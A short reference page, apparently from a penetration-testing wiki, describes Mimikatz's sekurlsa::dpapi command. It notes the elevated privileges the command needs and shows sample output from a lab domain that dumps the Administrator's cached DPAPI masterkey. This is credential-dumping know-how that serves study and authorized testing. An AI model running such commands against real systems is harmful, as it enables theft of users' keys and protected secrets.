dpapi
sekurlsa::dpapi lists DPAPI cached masterkeys.
This command requires elevated privileges (by previously running privilege::debug or by executing Mimikatz as the NT-AUTHORITY\SYSTEM account).
1
mimikatz # sekurlsa::dpapi
2
​
3
Authentication Id : 0 ; 227854 (00000000:00037a0e)
4
Session : RemoteInteractive from 2
5
User Name : Administrator
6
Domain : hacklab
7
Logon Server : DC
8
Logon Time : 10/17/2021 4:19:23 AM
9
SID : S-1-5-21-2725560159-1428537199-2260736313-500
10
[00000000]
11
* GUID : {0686f7cf-76f3-413b-a51e-28d0d0531013}
12
* Time : 10/17/2021 4:21:59 AM
13
* MasterKey : 6b5b148b9244efab617e417936227286c24d340cfb9900cc632dcf1d10fd258d16337df2e090251851dec676d9d525b1fc5bd99c9383084fd0e9f4d0c45a3b0e
14
* sha1(key) : c5049248822679fdb3e60ba37531ae3e805f7122
Copied!
Last modified 6mo ago
Copy link